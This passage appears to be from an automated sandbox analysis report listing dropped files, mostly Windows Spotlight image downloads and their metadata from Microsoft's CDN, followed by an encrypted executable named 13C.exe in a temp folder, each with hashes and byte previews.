                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .2.3.:.2.1.:.5.3. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.0.d.b.9.f.5.a.-.0.5.5.5.-.4.3.6.a.-.b.6.3.5.-.c.c.b.9.6.e.b.b.8.e.9.5...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.7.2.7.9.8.7...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\7e716a44-d46f-42ba-819e-1ad870190297.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.4204444333325688
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQizLr/:ZxMghwLtHSM1Sb9mSMXAvOf
                                                                                                                        MD5:69EC42767BCC5CEE5A189FC425B84465
                                                                                                                        SHA1:CE4B848763A15E9379BAD715BE394DB4F381E95F
                                                                                                                        SHA-256:099126C5D7E0375F4648D823761E763941ED67B55169B9C6BFECB06ED74F1856
                                                                                                                        SHA-512:5DF588622ACB60A8B79EE729A6D818EDA9EEAC8EFB4A0ED413E2CF179F68D16E9DAFAA1DDCD1D7D3A96936E32837CAF7FBC932E61411CAB2A73AEBC753906EEF
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.u.h.o.?.v.e.r.=.a.d.3.8...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\8d55ce73-4b6e-4fc2-8c77-af49ec66c092.7e4aef61-82dc-4c05-85c3-81f1b0303abe.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5787279232030773
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiwQfO1Wzgx71+f+fYMYsafc+Oc2CpXpjjX+vUViwQjBWX3BbN+zP6D:LLD2mRiHWOgvELbrfeIXpjjX+v8iHjBq
                                                                                                                        MD5:8267193EA712F064D8D137F0ED94624D
                                                                                                                        SHA1:44176BFD36C7E0E23106020D1E266C3ECDDD74DF
                                                                                                                        SHA-256:589148B40E1EFEF193CA4EB5F35D1DC591FCB22898346A7CA8655A3E70633FCB
                                                                                                                        SHA-512:7BBF2908CDEC58D9A8EE1949CBC3636F7B8C69E30EFBDF27B2D434BCEDC6F6C2E894D6B69C2E62A1D4957B776D6658D68EDE88D7979A30FC8438D71E999F91E5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .F.r.i.,. .1.4. .J.a.n. .2.0.2.2. .1.3.:.0.9.:.4.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .0.8.1.5.2.c.d.8.-.c.d.a.3.-.4.1.0.e.-.8.e.7.c.-.d.a.c.2.c.1.6.a.0.c.8.8...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .6.4.9.4.2.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\8d55ce73-4b6e-4fc2-8c77-af49ec66c092.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):278
                                                                                                                        Entropy (8bit):3.3958192057775554
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRm4AUo:ZxMghwLtHSM1Sb9mSMXAvwRm4AU
                                                                                                                        MD5:8FF007CE8512BF0CB7AF77033E0AC28E
                                                                                                                        SHA1:8F5BC2546847165502F11236D056EF83E97A4305
                                                                                                                        SHA-256:EF2F70B62E80BF46BFD71A89762993EAB3006186B1CD8CB9E9255E8897CF266C
                                                                                                                        SHA-512:872FD514C0096CF6A36426C37AA1E946A20AC78CDE7FB1D4E1E45A8C2D5059617F33FAEB4FEC7DB2BEA56CEDDA8CB8DEC5687225D20262D1903BDDF15D71AE31
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.Y.e.S.?.v.e.r.=.0.9.d.6...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\bdc8be70-232d-44db-b8b8-fc3a9a8df62c.d8889b23-4a02-470f-833a-b67283ec1ed8.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5913432744209213
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRivWzgx71+BqCTsafc+Oc2CpXpjjX+vUViZZBz5RX3z5Wbb/TeL:LLD2mRiYgv+PTrfeIXpjjX+v8i3Bz5R9
                                                                                                                        MD5:493F4DB619E362FC37095C0C075926CF
                                                                                                                        SHA1:69543AA935B7B1B1E76D9CAA1126608C2478956C
                                                                                                                        SHA-256:712BBF489C3EE89C2414725C89293818922B75D5B6E84B4759DE66D57439FBA3
                                                                                                                        SHA-512:7C7173FEDF919C56EF02A12707F19A15C532C4AB14D215A426C2319D1DBC7ECB9435D5623DC434B527F3DA964709BF6D6411014AFD518C4472B981F1208DD47A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.1.:.0.0.:.0.8. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .f.6.2.e.3.8.8.7.-.f.f.b.c.-.4.d.9.3.-.8.c.f.8.-.a.9.a.a.7.a.e.8.4.6.3.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.Q.9.e.R.?.v.e.r.=.b.7.f.9...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.3.7.1.1.3...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\bdc8be70-232d-44db-b8b8-fc3a9a8df62c.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2020:08:25 09:18:51]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1837113
                                                                                                                        Entropy (8bit):7.102008955383616
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:ZdC81bz+Y6eH6kUZlsEyfcq/irE/R0JGSUtvBafF3VVYEMntQRiOWXL47u694s3e:ZdC81bzpH/t0V9MiRnaL+ua3xBNU
                                                                                                                        MD5:799C3428C8E6A5556DD21C00AABEF97B
                                                                                                                        SHA1:D0130AB57E5ACE2CA39E2F49F3E822D82E9BBDCC
                                                                                                                        SHA-256:9978B1B37A71F1E041B11123A1451E93A2AAB6BBCEBC7DE01BA0B8BF22C74B11
                                                                                                                        SHA-512:B7A78F6175BA2F15C72C936CA30570A7D56B2BABEB3C031C202B81E85D2D661FEEF2B665A9263CAC417BC75D73344205F28C6C859DE84BC97B3421F2DBE97E3F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2020:08:25 09:18:51.........................................8..............................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....`....W.0....r..:...Z~.Pd.k5..Sk..X..x..`u..<)..q...7...G...g....4..x.T.G.0...z.l.o*....."6.+A.m..Ef.=.&L..v.7..G..jU....jzurt..P.l..5Z.G..G..i;..o..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d9ba0342-18ab-4279-adeb-d351ea245ae5.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2021:11:11 06:55:38]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1654488
                                                                                                                        Entropy (8bit):6.926504673655095
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:1k44jNiVr4qVhre8lekiZaSEKBcf/prV/RRJGoGaEqKEHisGpp7quKRDR7ripxi6:H4jNiVr4qXlZvKV9pp7qPRDNripY6
                                                                                                                        MD5:3C36C820F3E016E8A3A63C34BA7BEF07
                                                                                                                        SHA1:AF2A7EBB7A6D6C1815190C24EF732B2089115331
                                                                                                                        SHA-256:F62AFA107BBFE2FEAEF84AB87277D31DFE1AAABF61400F241FDD50C45AB19D7F
                                                                                                                        SHA-512:1074A8603B932052ED17825E83403D5F4EC3CD8CC7DB94BC4F262146DDA054640CBFB126FD728AB35C8B2B20285BC71CFE20BB3DEB3BDF8CC4B2877595B94C86
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2021:11:11 06:55:38.............................8..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................Z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..(..].1.............}S.... ..4mp#...w..[..`.[.P.=...g.w.U{........{..?..<..I..`..:._..d.T.k.q.m....;..1..........@..A1..5w.kZCk...*`....~.*...$9.{..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d9ba0342-18ab-4279-adeb-d351ea245ae5.eb16e995-ca84-40f4-ab30-b44222e03118.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5947028556775
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiqThWzgx71+0RWElsafc+Oc2CpXpjjX+vUViWBKsDhX3KsDmbpkwU:LLD2mRiGCgvHMElrfeIXpjjX+v8iWBKo
                                                                                                                        MD5:FD409FA92FBEA2FD7073CDD1A343D129
                                                                                                                        SHA1:176E1C047344F309731B6E3733624C09ED0E392D
                                                                                                                        SHA-256:844648EF68EFF5EE414A1C551D9262412CBA813B75D17559FE886C480A548ECA
                                                                                                                        SHA-512:57FDBABD69D84D9379D59824B3BDB65C9871B6176B8F4E83E7EA96D4BE38EEAAEDB03EFE97DDC6B0FA3C89866D345362DAA94C394DF05E896AFFA0DB03E7A7EF
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.0.:.0.4.:.1.6. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .1.8.a.0.a.0.2.3.-.f.c.b.3.-.4.c.6.1.-.8.d.f.7.-.7.f.0.8.a.a.4.1.e.3.7.2...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.6.5.4.4.8.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.6.5.4.4.8.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e0fc5cf9-8432-419c-98fa-5245d76af360.a214058d-4932-49cc-ab40-d730f65403f6.down_meta
Process: C:\Windows\System32\BackgroundTransferHost.exe
File Type: data
Category: dropped
Size (bytes): 1228
Entropy (8bit): 3.605918884002608
Encrypted: false
SSDEEP: 24:LLVR2mRiw0oUWzgx71++Bisafc+Oc2CpXpjjX+vUViwzB+vFX3+vqbbL0D:LLD2mRiabgvJirfeIXpjjX+v8iqBCX3S
MD5: 195D829E09800C81AE13EBEF1D5FCB05
SHA1: DDBC8B89C88BA51ABCB9C3E91E08EE956C2E40B8
SHA-256: AF908F5DE5D73626FEF4AEACE77887D9025A763E2B99B3AEBF05F56CDF5304C7
SHA-512: 5C62BB28712F1BCA6AF00515DBB3BEB0081F52987C03F622CCC44595C30A5CE8BC935A398D0C2DFA8A9694F4C55BC5E07818CB1F9581EC020DC4BDD3357B3433
Malicious: false
Reputation: unknown
Preview (UTF-16LE text, decoded; truncated as in the report):
  https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4CVB5?ver=dd3a
  Last-Modified: Tue, 11 Jan 2022 20:52:07 GMT
  Access-Control-Allow-Origin: *
  X-Datacenter: northeu
  X-ActivityId: 762f8971-d6db-4c64-8065-9d4f02b9867b
  Timing-Allow-Origin: *
  X-Frame-Options: deny
  X-ResizerVersion: 1.0
  Content-Type: image/jpeg
  Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE4CVB5?ver=dd3a
  X-Source-Length: 755431
  Content-Length: 755431
  Cache-Control: pub
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e0fc5cf9-8432-419c-98fa-5245d76af360.down_data
Process: C:\Windows\System32\BackgroundTransferHost.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1920x1080, frames 3
Category: dropped
Size (bytes): 755431
Entropy (8bit): 7.889494455004551
Encrypted: false
SSDEEP: 12288:skGgYlPnhhvcDi/Pg5Bn3Vv0eucNiMc+cQpawhhIfB7iTzWqovkjset8scoXmizl:skGgC6iAnFvw6iMA+hIp7Ado8tpv
MD5: FFE1E08E186355FBDAA8C57461BAA6DA
SHA1: 3FBA91092AE606FEB46FE84225C4016CEB5E0872
SHA-256: D62A3279E0AD100138EF5A397B53029AF95E42BE9BF9FEC30D9A7A246DC75111
SHA-512: DB703B8C3F3E3AE8B340F415291FF7C8A22CFFD72F23642C3F2EB115B6CF14EB3C398C0E5E13DFB421A0FCA697A7CE0A56C7CC45C1DE22F032FD332BDD03F8C8
Malicious: false
Reputation: unknown
                                                                                                                        Preview: ......JFIF.....`.`.....C....................................................................C.......................................................................8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....R9.E$.,.Y...z..{..'.....V...Yj.....m....w...[z}......K....n..'..._.IV....9..C..<3d..V..m..ZnV..-.w...v?...}.....u.$..r....{j..==k....]b.sE..o..#8..v..s+Tg-z-J.C.}hC..........m..bk.....OE..Z.......z....Q..K.(..>e...kb..5]>8:.V+...Oc]S.......cZ.j.v...O3G=..w,..v.n8.\....%......k..z....d.my%.r.o,....I...5[.]X.k.....8..7.......!.U...W.PV.N.K..>...k{.m..
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ee43e9f0-56a7-4da5-a52e-7978cee7ce3e.eb16e995-ca84-40f4-ab30-b44222e03118.down_meta
Process: C:\Windows\System32\BackgroundTransferHost.exe
File Type: data
Category: dropped
Size (bytes): 1228
Entropy (8bit): 3.5947028556775
Encrypted: false
SSDEEP: 24:LLVR2mRiqThWzgx71+0RWElsafc+Oc2CpXpjjX+vUViWBKsDhX3KsDmbpkwU:LLD2mRiGCgvHMElrfeIXpjjX+v8iWBKo
MD5: FD409FA92FBEA2FD7073CDD1A343D129
SHA1: 176E1C047344F309731B6E3733624C09ED0E392D
SHA-256: 844648EF68EFF5EE414A1C551D9262412CBA813B75D17559FE886C480A548ECA
SHA-512: 57FDBABD69D84D9379D59824B3BDB65C9871B6176B8F4E83E7EA96D4BE38EEAAEDB03EFE97DDC6B0FA3C89866D345362DAA94C394DF05E896AFFA0DB03E7A7EF
Malicious: false
Reputation: unknown
Preview (UTF-16LE text, decoded; truncated as in the report):
  https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWP0UC?ver=2f44
  Last-Modified: Thu, 13 Jan 2022 10:04:16 GMT
  Access-Control-Allow-Origin: *
  X-Datacenter: northeu
  X-ActivityId: 18a0a023-fcb3-4c61-8df7-7f08aa41e372
  Timing-Allow-Origin: *
  X-Frame-Options: deny
  X-ResizerVersion: 1.0
  Content-Type: image/jpeg
  Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RWP0UC?ver=2f44
  X-Source-Length: 1654488
  Content-Length: 1654488
  Cache-Control: pub
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ee43e9f0-56a7-4da5-a52e-7978cee7ce3e.up_meta
Process: C:\Windows\System32\BackgroundTransferHost.exe
File Type: data
Category: dropped
Size (bytes): 276
Entropy (8bit): 3.411328286431714
Encrypted: false
SSDEEP: 6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi9PzM:ZxMghwLtHSM1Sb9mSMXAv
MD5: F89B0A182CEC59870B296ADB7C2FC692
SHA1: C9301A976859229017D581106CABF70BE78E9726
SHA-256: 03C5CB5701A4D9E152464A849CA4573C9009C7D6F878E6456A482756210FC37B
SHA-512: D4923FA307B710FC1B87B47A40394ECB85084F0E064D296BCE477EEA9EA36A8918103498D7FAC813F8C8554330CCBB09E856CEFB830E6449787F8260D4A26F2B
Malicious: false
Reputation: unknown
Preview (UTF-16LE text, decoded; trailing nulls omitted):
  F420C4EA-4261-4B66-8B9C-EAA8CCC96ADE
  GET
  https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWP0UC?ver=2f44
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f3c574c2-74c3-4fcb-a00b-1b0c64e37f0d.701c9b8b-e624-449d-a7f7-5920d87b9fa6.down_meta
Process: C:\Windows\System32\BackgroundTransferHost.exe
File Type: data
Category: dropped
Size (bytes): 1228
Entropy (8bit): 3.596377708245441
Encrypted: false
SSDEEP: 24:LLVR2mRiJTyWzgx71+XxPWJsafc+Oc2CpXpjjX+vUVi9BKkX3KPbDkwU:LLD2mRiNZgvIOJrfeIXpjjX+v8i9BKkX
MD5: 0FE0FF6CA45026CD1EBF503AC1ACEBFB
SHA1: EF50B263F19557055B5532596B2D25AD258675A9
SHA-256: EBAA06E959ED054EC3F00769234D5D05D09996EF388448147655EEBA2488483F
SHA-512: 4FA7BF1964C753E5E21CB8610186FDA56210CE8F83733389FC2E8133D2AE694E97BE508026437168EE5480E38EC1A293AB82B5A62D2FD22E192C2EB5F3C1E05E
Malicious: false
Reputation: unknown
Preview (UTF-16LE text, decoded; truncated as in the report):
  https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWP8kk?ver=8c62
  Last-Modified: Thu, 13 Jan 2022 17:11:10 GMT
  Access-Control-Allow-Origin: *
  X-Datacenter: northeu
  X-ActivityId: 4e0a9346-0990-43c9-8323-2183520d56b3
  Timing-Allow-Origin: *
  X-Frame-Options: deny
  X-ResizerVersion: 1.0
  Content-Type: image/jpeg
  Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RWP8kk?ver=8c62
  X-Source-Length: 1829994
  Content-Length: 1829994
  Cache-Control: pub
C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f3c574c2-74c3-4fcb-a00b-1b0c64e37f0d.down_data
Process: C:\Windows\System32\BackgroundTransferHost.exe
File Type: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2021:11:11 06:54:34]
Category: dropped
Size (bytes): 1829994
Entropy (8bit): 7.092403290156545
Encrypted: false
SSDEEP: 24576:LdC81bzA4GeD+kaZRfEyfcA/ir2/R0JGSUmfyttS6dSTeuErzQP/Lg40bw2Rf02b:LdC81bz/Dq39STvErQ/05d0k
MD5: 4FB1CD4A9C7B4165BF8CD730F367600C
SHA1: 1FD8481802A3512CC65105B600C9339784A31E10
SHA-256: E60B827FEE4A3A7FF6033C3F244AE04D5A51D7E581936BE750F2EABE4F72E2A0
SHA-512: C3D101D94A75EFE81C7E8AB1F45654271A67048A6439C2C202589038519D24B62A98F77EA267AE320ED2FC9AFBB7D6C4AE4B079C19AA05E4F7D7BA7A87C79E61
Malicious: false
Reputation: unknown
                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2021:11:11 06:54:34.........................................8..............................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...n.fx..w.V..^N[..k .u....T.y._M.=..$..k.G..gV...i..4..j.)..k..a~.~.K.2....:..-wc..[....(....X....&y.<...pu..C@..>.J......k.8..........@..xdx...:.V..X
C:\Users\user\AppData\Local\Temp\13C.exe
Process: C:\Windows\explorer.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 7336391
Entropy (8bit): 7.993025428513385
Encrypted: true
SSDEEP: 196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
MD5: CBE604877A46CEEBA112802BC17FFEF8
SHA1: E85AB4CCBE491348C39F751162FFF71A90643ECA
SHA-256: 32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
